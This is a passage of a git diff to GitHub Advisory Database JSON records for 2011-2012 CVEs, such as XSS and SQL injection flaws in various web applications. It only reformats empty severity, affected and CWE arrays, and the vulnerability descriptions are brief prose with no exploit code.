b/advisories/unreviewed/2022/05/GHSA-chcm-cfp6-rx55/GHSA-chcm-cfp6-rx55.json @@ -7,12 +7,8 @@ "CVE-2012-1564" ], "details": "Cross-site scripting (XSS) vulnerability in administration/create_album.php in YVS Image Gallery allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-chr5-w9ff-5gcw/GHSA-chr5-w9ff-5gcw.json b/advisories/unreviewed/2022/05/GHSA-chr5-w9ff-5gcw/GHSA-chr5-w9ff-5gcw.json index f5528b54b90..1ff0c1f91fa 100644 --- a/advisories/unreviewed/2022/05/GHSA-chr5-w9ff-5gcw/GHSA-chr5-w9ff-5gcw.json +++ b/advisories/unreviewed/2022/05/GHSA-chr5-w9ff-5gcw/GHSA-chr5-w9ff-5gcw.json @@ -7,12 +7,8 @@ "CVE-2012-2948" ], "details": "chan_skinny.c in the Skinny (aka SCCP) channel driver in Certified Asterisk 1.8.11-cert before 1.8.11-cert2 and Asterisk Open Source 1.8.x before 1.8.12.1 and 10.x before 10.4.1 allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) by closing a connection in off-hook mode.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-cm65-32vm-fcjq/GHSA-cm65-32vm-fcjq.json b/advisories/unreviewed/2022/05/GHSA-cm65-32vm-fcjq/GHSA-cm65-32vm-fcjq.json index a368334881e..2790697b094 100644 --- a/advisories/unreviewed/2022/05/GHSA-cm65-32vm-fcjq/GHSA-cm65-32vm-fcjq.json +++ b/advisories/unreviewed/2022/05/GHSA-cm65-32vm-fcjq/GHSA-cm65-32vm-fcjq.json @@ -7,12 +7,8 @@ "CVE-2012-2048" ], "details": "Unspecified vulnerability in Adobe ColdFusion 10 and earlier allows attackers to cause a denial of service via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-cmc3-76m8-f9wh/GHSA-cmc3-76m8-f9wh.json b/advisories/unreviewed/2022/05/GHSA-cmc3-76m8-f9wh/GHSA-cmc3-76m8-f9wh.json index 26b0ba3f88e..201ce47c689 100644 --- a/advisories/unreviewed/2022/05/GHSA-cmc3-76m8-f9wh/GHSA-cmc3-76m8-f9wh.json +++ b/advisories/unreviewed/2022/05/GHSA-cmc3-76m8-f9wh/GHSA-cmc3-76m8-f9wh.json @@ -7,12 +7,8 @@ "CVE-2011-5136" ], "details": "showImg.php in EPractize Labs Subscription Manager, possibly 1.0, allows remote attackers to overwrite arbitrary files via the db parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-cmxp-vp29-cqw4/GHSA-cmxp-vp29-cqw4.json b/advisories/unreviewed/2022/05/GHSA-cmxp-vp29-cqw4/GHSA-cmxp-vp29-cqw4.json index e7d62b6cb1b..fa8713d9fe6 100644 --- a/advisories/unreviewed/2022/05/GHSA-cmxp-vp29-cqw4/GHSA-cmxp-vp29-cqw4.json +++ b/advisories/unreviewed/2022/05/GHSA-cmxp-vp29-cqw4/GHSA-cmxp-vp29-cqw4.json @@ -7,12 +7,8 @@ "CVE-2012-3228" ], "details": "Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking component in Oracle Financial Services Software 5.0.2, 5.0.5, 5.1.0, 5.2.0, 5.3.0 through 5.3.4, 6.0.1, and 6.2.0 allows remote authenticated users to affect integrity and availability, related to BASE.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-cpqq-ch36-7c84/GHSA-cpqq-ch36-7c84.json b/advisories/unreviewed/2022/05/GHSA-cpqq-ch36-7c84/GHSA-cpqq-ch36-7c84.json index 0df94242e55..9f75a6d3e13 100644 --- a/advisories/unreviewed/2022/05/GHSA-cpqq-ch36-7c84/GHSA-cpqq-ch36-7c84.json +++ b/advisories/unreviewed/2022/05/GHSA-cpqq-ch36-7c84/GHSA-cpqq-ch36-7c84.json @@ -7,12 +7,8 @@ "CVE-2012-2679" ], "details": "Red Hat Network (RHN) Configuration Client (rhncfg-client) in rhncfg before 5.10.27-8 uses weak permissions (world-readable) for /var/log/rhncfg-actions, which allows local users to obtain sensitive information about the rhncfg-client actions by reading the file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-cq9p-jcwj-qcvm/GHSA-cq9p-jcwj-qcvm.json b/advisories/unreviewed/2022/05/GHSA-cq9p-jcwj-qcvm/GHSA-cq9p-jcwj-qcvm.json index 552b675632a..0ceaea560b8 100644 --- a/advisories/unreviewed/2022/05/GHSA-cq9p-jcwj-qcvm/GHSA-cq9p-jcwj-qcvm.json +++ b/advisories/unreviewed/2022/05/GHSA-cq9p-jcwj-qcvm/GHSA-cq9p-jcwj-qcvm.json @@ -7,12 +7,8 @@ "CVE-2012-0719" ], "details": "Cross-site scripting (XSS) vulnerability in IBM Tivoli Endpoint Manager (TEM) 8 before 8.2 patch 3 allows remote attackers to inject arbitrary web script or HTML via the ScheduleParam parameter to the webreports program.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-cqp4-gpw2-h4r2/GHSA-cqp4-gpw2-h4r2.json b/advisories/unreviewed/2022/05/GHSA-cqp4-gpw2-h4r2/GHSA-cqp4-gpw2-h4r2.json index 7ce94a14a99..c65a3d677b2 100644 --- a/advisories/unreviewed/2022/05/GHSA-cqp4-gpw2-h4r2/GHSA-cqp4-gpw2-h4r2.json +++ b/advisories/unreviewed/2022/05/GHSA-cqp4-gpw2-h4r2/GHSA-cqp4-gpw2-h4r2.json @@ -7,12 +7,8 @@ "CVE-2012-3233" ], "details": "Cross-site scripting (XSS) vulnerability in __swift/thirdparty/PHPExcel/PHPExcel/Shared/JAMA/docs/download.php in Kayako Fusion 4.40.1148, and possibly before 4.50.1581, allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-crq9-rq4m-26gj/GHSA-crq9-rq4m-26gj.json b/advisories/unreviewed/2022/05/GHSA-crq9-rq4m-26gj/GHSA-crq9-rq4m-26gj.json index 94a17df77c8..346e8ef72dc 100644 --- a/advisories/unreviewed/2022/05/GHSA-crq9-rq4m-26gj/GHSA-crq9-rq4m-26gj.json +++ b/advisories/unreviewed/2022/05/GHSA-crq9-rq4m-26gj/GHSA-crq9-rq4m-26gj.json @@ -7,12 +7,8 @@ "CVE-2012-1503" ], "details": "Cross-site scripting (XSS) vulnerability in Six Apart (formerly Six Apart KK) Movable Type (MT) Pro 5.13 allows remote attackers to inject arbitrary web script or HTML via the comment section.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-cv7h-2qqx-2rrp/GHSA-cv7h-2qqx-2rrp.json b/advisories/unreviewed/2022/05/GHSA-cv7h-2qqx-2rrp/GHSA-cv7h-2qqx-2rrp.json index 70b02628390..463c975958d 100644 --- a/advisories/unreviewed/2022/05/GHSA-cv7h-2qqx-2rrp/GHSA-cv7h-2qqx-2rrp.json +++ b/advisories/unreviewed/2022/05/GHSA-cv7h-2qqx-2rrp/GHSA-cv7h-2qqx-2rrp.json @@ -7,12 +7,8 @@ "CVE-2012-1584" ], "details": "Integer overflow in the mid function in toolkit/tbytevector.cpp in TagLib 1.7 and earlier allows context-dependent attackers to cause a denial of service (application crash) via a crafted file header field in a media file, which triggers a large memory allocation.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -68,9 +64,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-cw26-3hx5-52c9/GHSA-cw26-3hx5-52c9.json b/advisories/unreviewed/2022/05/GHSA-cw26-3hx5-52c9/GHSA-cw26-3hx5-52c9.json index 1925847905f..8f14b5adecf 100644 --- a/advisories/unreviewed/2022/05/GHSA-cw26-3hx5-52c9/GHSA-cw26-3hx5-52c9.json +++ b/advisories/unreviewed/2022/05/GHSA-cw26-3hx5-52c9/GHSA-cw26-3hx5-52c9.json @@ -7,12 +7,8 @@ "CVE-2012-1640" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in the Managesite module 6.x-1.x before 6.1-1.1 for Drupal allow remote authenticated users with \"administer managesite\" permissions to inject arbitrary web script or HTML via the title parameter when (1) adding or (2) updating a category.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-cwjj-52x2-v74j/GHSA-cwjj-52x2-v74j.json b/advisories/unreviewed/2022/05/GHSA-cwjj-52x2-v74j/GHSA-cwjj-52x2-v74j.json index 8c311031fe7..294b82bae14 100644 --- a/advisories/unreviewed/2022/05/GHSA-cwjj-52x2-v74j/GHSA-cwjj-52x2-v74j.json +++ b/advisories/unreviewed/2022/05/GHSA-cwjj-52x2-v74j/GHSA-cwjj-52x2-v74j.json @@ -7,12 +7,8 @@ "CVE-2012-3568" ], "details": "Opera before 12.00 Beta allows remote attackers to cause a denial of service (application crash) via crafted WebGL content, as demonstrated by a codeflow.org WebGL demo.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-cwq8-5gf7-6jfp/GHSA-cwq8-5gf7-6jfp.json b/advisories/unreviewed/2022/05/GHSA-cwq8-5gf7-6jfp/GHSA-cwq8-5gf7-6jfp.json index d5dbef605d6..09e373670a6 100644 --- a/advisories/unreviewed/2022/05/GHSA-cwq8-5gf7-6jfp/GHSA-cwq8-5gf7-6jfp.json +++ b/advisories/unreviewed/2022/05/GHSA-cwq8-5gf7-6jfp/GHSA-cwq8-5gf7-6jfp.json @@ -7,12 +7,8 @@ "CVE-2012-2731" ], "details": "The Ubercart AJAX Cart 6.x-2.x before 6.x-2.1 for Drupal stores the PHP session id in the JavaScript settings array in page loads, which might allow remote attackers to obtain sensitive information by sniffing or reading the cache of the HTML of a webpage.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-cwwf-gv4g-7qhw/GHSA-cwwf-gv4g-7qhw.json b/advisories/unreviewed/2022/05/GHSA-cwwf-gv4g-7qhw/GHSA-cwwf-gv4g-7qhw.json index ce51fee0e62..26fc158beef 100644 --- a/advisories/unreviewed/2022/05/GHSA-cwwf-gv4g-7qhw/GHSA-cwwf-gv4g-7qhw.json +++ b/advisories/unreviewed/2022/05/GHSA-cwwf-gv4g-7qhw/GHSA-cwwf-gv4g-7qhw.json @@ -7,12 +7,8 @@ "CVE-2012-1072" ], "details": "SQL injection vulnerability in the Category-System (toi_category) extension 0.6.0 and earlier for TYPO3 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-cx5m-7r8x-4835/GHSA-cx5m-7r8x-4835.json b/advisories/unreviewed/2022/05/GHSA-cx5m-7r8x-4835/GHSA-cx5m-7r8x-4835.json index 18d4fb5dbac..76c8f82667c 100644 --- a/advisories/unreviewed/2022/05/GHSA-cx5m-7r8x-4835/GHSA-cx5m-7r8x-4835.json +++ b/advisories/unreviewed/2022/05/GHSA-cx5m-7r8x-4835/GHSA-cx5m-7r8x-4835.json @@ -7,12 +7,8 @@ "CVE-2011-4776" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in the Control Panel in Parallels Plesk Panel 10.4.4_build20111103.18 allow remote attackers to inject arbitrary web script or HTML via crafted input to a PHP script, as demonstrated by admin/update/settings/ and certain other files.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-cxgx-c6gj-qh93/GHSA-cxgx-c6gj-qh93.json b/advisories/unreviewed/2022/05/GHSA-cxgx-c6gj-qh93/GHSA-cxgx-c6gj-qh93.json index c72f20de800..5cb4cf2193f 100644 --- a/advisories/unreviewed/2022/05/GHSA-cxgx-c6gj-qh93/GHSA-cxgx-c6gj-qh93.json +++ b/advisories/unreviewed/2022/05/GHSA-cxgx-c6gj-qh93/GHSA-cxgx-c6gj-qh93.json @@ -7,12 +7,8 @@ "CVE-2012-1005" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in Sphinx Software Mobile Web Server 3.1.2.47 allow remote attackers to inject arbitrary web script or HTML via the comment parameter to a blog, as demonstrated using (1) Blog/MyFirstBlog.txt or (2) Blog/AboutSomething.txt.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f24x-wp94-r3f6/GHSA-f24x-wp94-r3f6.json b/advisories/unreviewed/2022/05/GHSA-f24x-wp94-r3f6/GHSA-f24x-wp94-r3f6.json index 11ce92e3fc1..c0aa6a57df1 100644 --- a/advisories/unreviewed/2022/05/GHSA-f24x-wp94-r3f6/GHSA-f24x-wp94-r3f6.json +++ b/advisories/unreviewed/2022/05/GHSA-f24x-wp94-r3f6/GHSA-f24x-wp94-r3f6.json @@ -7,12 +7,8 @@ "CVE-2012-0736" ], "details": "IBM Rational AppScan Enterprise 5.x and 8.x before 8.5.0.1 does not properly create scan jobs, which allows remote attackers to execute arbitrary code via a crafted web site.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f2vh-2fr3-3pmx/GHSA-f2vh-2fr3-3pmx.json b/advisories/unreviewed/2022/05/GHSA-f2vh-2fr3-3pmx/GHSA-f2vh-2fr3-3pmx.json index 3832a500b8b..39d4b67d12f 100644 --- a/advisories/unreviewed/2022/05/GHSA-f2vh-2fr3-3pmx/GHSA-f2vh-2fr3-3pmx.json +++ b/advisories/unreviewed/2022/05/GHSA-f2vh-2fr3-3pmx/GHSA-f2vh-2fr3-3pmx.json @@ -7,12 +7,8 @@ "CVE-2012-1067" ], "details": "SQL injection vulnerability in the WP-RecentComments plugin 2.0.7 for WordPress allows remote attackers to execute arbitrary SQL commands via the id parameter in an rc-content action to index.php. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f33x-wpq3-p8fh/GHSA-f33x-wpq3-p8fh.json b/advisories/unreviewed/2022/05/GHSA-f33x-wpq3-p8fh/GHSA-f33x-wpq3-p8fh.json index 8970cc02a95..958d59d64c0 100644 --- a/advisories/unreviewed/2022/05/GHSA-f33x-wpq3-p8fh/GHSA-f33x-wpq3-p8fh.json +++ b/advisories/unreviewed/2022/05/GHSA-f33x-wpq3-p8fh/GHSA-f33x-wpq3-p8fh.json @@ -7,12 +7,8 @@ "CVE-2012-2592" ], "details": "Cross-site scripting (XSS) vulnerability in Axigen Mail Server 8.0.1 allows remote attackers to inject arbitrary web script or HTML via the body of an email.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f36w-fhwh-qgp2/GHSA-f36w-fhwh-qgp2.json b/advisories/unreviewed/2022/05/GHSA-f36w-fhwh-qgp2/GHSA-f36w-fhwh-qgp2.json index a53db53c442..6e41d63a92b 100644 --- a/advisories/unreviewed/2022/05/GHSA-f36w-fhwh-qgp2/GHSA-f36w-fhwh-qgp2.json +++ b/advisories/unreviewed/2022/05/GHSA-f36w-fhwh-qgp2/GHSA-f36w-fhwh-qgp2.json @@ -7,12 +7,8 @@ "CVE-2011-5202" ], "details": "BazisVirtualCDBus.sys in WinCDEmu 3.6 allows local users to cause a denial of service (system crash) via the unmount command to batchmnt.exe.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f3gx-cg96-r5vh/GHSA-f3gx-cg96-r5vh.json b/advisories/unreviewed/2022/05/GHSA-f3gx-cg96-r5vh/GHSA-f3gx-cg96-r5vh.json index 0b00f1bb356..dd19c8623d7 100644 --- a/advisories/unreviewed/2022/05/GHSA-f3gx-cg96-r5vh/GHSA-f3gx-cg96-r5vh.json +++ b/advisories/unreviewed/2022/05/GHSA-f3gx-cg96-r5vh/GHSA-f3gx-cg96-r5vh.json @@ -7,12 +7,8 @@ "CVE-2012-2176" ], "details": "Multiple stack-based buffer overflows in a certain ActiveX control in qp2.cab in IBM Lotus Quickr 8.2 before 8.2.0.27-002a for Domino allow remote attackers to execute arbitrary code via a long argument to the (1) Attachment_Times or (2) Import_Times method.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f3x3-49j2-r3jp/GHSA-f3x3-49j2-r3jp.json b/advisories/unreviewed/2022/05/GHSA-f3x3-49j2-r3jp/GHSA-f3x3-49j2-r3jp.json index fae188d882c..b8889a163f9 100644 --- a/advisories/unreviewed/2022/05/GHSA-f3x3-49j2-r3jp/GHSA-f3x3-49j2-r3jp.json +++ b/advisories/unreviewed/2022/05/GHSA-f3x3-49j2-r3jp/GHSA-f3x3-49j2-r3jp.json @@ -7,12 +7,8 @@ "CVE-2012-0991" ], "details": "Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f3xg-5g66-876x/GHSA-f3xg-5g66-876x.json b/advisories/unreviewed/2022/05/GHSA-f3xg-5g66-876x/GHSA-f3xg-5g66-876x.json index b89510c7092..0ac3e010126 100644 --- a/advisories/unreviewed/2022/05/GHSA-f3xg-5g66-876x/GHSA-f3xg-5g66-876x.json +++ b/advisories/unreviewed/2022/05/GHSA-f3xg-5g66-876x/GHSA-f3xg-5g66-876x.json @@ -7,12 +7,8 @@ "CVE-2012-1116" ], "details": "SQL injection vulnerability in Joomla! 1.7.x and 2.5.x before 2.5.2 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f4fc-rxg5-jwv5/GHSA-f4fc-rxg5-jwv5.json b/advisories/unreviewed/2022/05/GHSA-f4fc-rxg5-jwv5/GHSA-f4fc-rxg5-jwv5.json index 61d62f39eff..7ca0f35eb2d 100644 --- a/advisories/unreviewed/2022/05/GHSA-f4fc-rxg5-jwv5/GHSA-f4fc-rxg5-jwv5.json +++ b/advisories/unreviewed/2022/05/GHSA-f4fc-rxg5-jwv5/GHSA-f4fc-rxg5-jwv5.json @@ -7,12 +7,8 @@ "CVE-2012-1219" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in freelancerKit 2.35 allow remote attackers to inject arbitrary web script or HTML via the (1) ticket parameter to tickets.php, (2) title parameter to notes.php, or (3) task parameter to todo.php. NOTE: some of these details are obtained from third party information.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f4j3-3p4m-g2gh/GHSA-f4j3-3p4m-g2gh.json b/advisories/unreviewed/2022/05/GHSA-f4j3-3p4m-g2gh/GHSA-f4j3-3p4m-g2gh.json index 5d52227451c..8c7014c8c0f 100644 --- a/advisories/unreviewed/2022/05/GHSA-f4j3-3p4m-g2gh/GHSA-f4j3-3p4m-g2gh.json +++ b/advisories/unreviewed/2022/05/GHSA-f4j3-3p4m-g2gh/GHSA-f4j3-3p4m-g2gh.json @@ -7,12 +7,8 @@ "CVE-2012-4032" ], "details": "Open redirect vulnerability in the login page in WebsitePanel before 1.2.2.1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in ReturnUrl to Default.aspx.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f4xq-x5xf-5rxv/GHSA-f4xq-x5xf-5rxv.json b/advisories/unreviewed/2022/05/GHSA-f4xq-x5xf-5rxv/GHSA-f4xq-x5xf-5rxv.json index 41d7168ea28..20e2dbfb009 100644 --- a/advisories/unreviewed/2022/05/GHSA-f4xq-x5xf-5rxv/GHSA-f4xq-x5xf-5rxv.json +++ b/advisories/unreviewed/2022/05/GHSA-f4xq-x5xf-5rxv/GHSA-f4xq-x5xf-5rxv.json @@ -7,12 +7,8 @@ "CVE-2012-0902" ], "details": "AirTies Air 4450 1.1.2.18 allows remote attackers to cause a denial of service (reboot) via a direct request to cgi-bin/loader.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-f54r-7cc6-9xfj/GHSA-f54r-7cc6-9xfj.json b/advisories/unreviewed/2022/05/GHSA-f54r-7cc6-9xfj/GHSA-f54r-7cc6-9xfj.json index 62d36aa9f48..198b02cab02 100644 --- a/advisories/unreviewed/2022/05/GHSA-f54r-7cc6-9xfj/GHSA-f54r-7cc6-9xfj.json +++ b/advisories/unreviewed/2022/05/GHSA-f54r-7cc6-9xfj/GHSA-f54r-7cc6-9xfj.json @@ -7,12 +7,8 @@ "CVE-2012-1765" ], "details": "Unspecified vulnerability in Oracle Sun Solaris 10 allows local users to affect integrity via unknown vectors related to Branded Zone.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-f562-34hv-qg95/GHSA-f562-34hv-qg95.json b/advisories/unreviewed/2022/05/GHSA-f562-34hv-qg95/GHSA-f562-34hv-qg95.json index 5441dafcba9..6abb432df64 100644 --- a/advisories/unreviewed/2022/05/GHSA-f562-34hv-qg95/GHSA-f562-34hv-qg95.json +++ b/advisories/unreviewed/2022/05/GHSA-f562-34hv-qg95/GHSA-f562-34hv-qg95.json @@ -7,12 +7,8 @@ "CVE-2012-2246" ], "details": "Mahara 1.4.x before 1.4.5 and 1.5.x before 1.5.4 allows remote attackers to conduct clickjacking attacks to delete arbitrary users and bypass CSRF protection via account/delete.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f598-w9pf-6r29/GHSA-f598-w9pf-6r29.json b/advisories/unreviewed/2022/05/GHSA-f598-w9pf-6r29/GHSA-f598-w9pf-6r29.json index 992d1165b32..a74172d64ac 100644 --- a/advisories/unreviewed/2022/05/GHSA-f598-w9pf-6r29/GHSA-f598-w9pf-6r29.json +++ b/advisories/unreviewed/2022/05/GHSA-f598-w9pf-6r29/GHSA-f598-w9pf-6r29.json @@ -7,12 +7,8 @@ "CVE-2012-2163" ], "details": "IBM Scale Out Network Attached Storage (SONAS) 1.1 through 1.3.1 allows remote authenticated administrators to execute arbitrary Linux commands via the (1) Command Line Interface or (2) Graphical User Interface, related to a \"code injection\" issue.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-f5p9-vc4w-mc6r/GHSA-f5p9-vc4w-mc6r.json b/advisories/unreviewed/2022/05/GHSA-f5p9-vc4w-mc6r/GHSA-f5p9-vc4w-mc6r.json index 4321ce860db..fe1c11ed6b9 100644 --- a/advisories/unreviewed/2022/05/GHSA-f5p9-vc4w-mc6r/GHSA-f5p9-vc4w-mc6r.json +++ b/advisories/unreviewed/2022/05/GHSA-f5p9-vc4w-mc6r/GHSA-f5p9-vc4w-mc6r.json @@ -7,12 +7,8 @@ "CVE-2012-0701" ], "details": "The client applications in the DataStage Administrator client in InfoSphere DataStage in IBM InfoSphere Information Server 8.1, 8.5 before FP3, and 8.7 rely on client-side access control, which allows remote authenticated users to gain privileges via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-f5pm-ggr8-6hjx/GHSA-f5pm-ggr8-6hjx.json b/advisories/unreviewed/2022/05/GHSA-f5pm-ggr8-6hjx/GHSA-f5pm-ggr8-6hjx.json index 21a6068975f..dd38a3f2557 100644 --- a/advisories/unreviewed/2022/05/GHSA-f5pm-ggr8-6hjx/GHSA-f5pm-ggr8-6hjx.json +++ b/advisories/unreviewed/2022/05/GHSA-f5pm-ggr8-6hjx/GHSA-f5pm-ggr8-6hjx.json @@ -7,12 +7,8 @@ "CVE-2012-1810" ], "details": "EOSCoreScada.exe in C3-ilex EOScada before 11.0.19.2 allows remote attackers to cause a denial of service (daemon restart) by sending data to TCP port (1) 5050 or (2) 24004.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-f5rv-ph9h-95jp/GHSA-f5rv-ph9h-95jp.json b/advisories/unreviewed/2022/05/GHSA-f5rv-ph9h-95jp/GHSA-f5rv-ph9h-95jp.json index dc55c14af20..b0330e362f8 100644 --- a/advisories/unreviewed/2022/05/GHSA-f5rv-ph9h-95jp/GHSA-f5rv-ph9h-95jp.json +++ b/advisories/unreviewed/2022/05/GHSA-f5rv-ph9h-95jp/GHSA-f5rv-ph9h-95jp.json @@ -7,12 +7,8 @@ "CVE-2012-2703" ], "details": "Cross-site scripting (XSS) vulnerability in the Advertisement module 6.x-2.x before 6.x-2.3 for Drupal, when debug mode is enabled, allows remote attackers to inject arbitrary web script or HTML via vectors related to the \"$conf variable in settings.php.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f6c3-6qwv-83gq/GHSA-f6c3-6qwv-83gq.json b/advisories/unreviewed/2022/05/GHSA-f6c3-6qwv-83gq/GHSA-f6c3-6qwv-83gq.json index fe1296137b6..c8725ca1917 100644 --- a/advisories/unreviewed/2022/05/GHSA-f6c3-6qwv-83gq/GHSA-f6c3-6qwv-83gq.json +++ b/advisories/unreviewed/2022/05/GHSA-f6c3-6qwv-83gq/GHSA-f6c3-6qwv-83gq.json @@ -7,12 +7,8 @@ "CVE-2011-5218" ], "details": "SQL injection vulnerability in DotA OpenStats 1.3.9 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter to index.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f6pm-r74q-rw7g/GHSA-f6pm-r74q-rw7g.json b/advisories/unreviewed/2022/05/GHSA-f6pm-r74q-rw7g/GHSA-f6pm-r74q-rw7g.json index 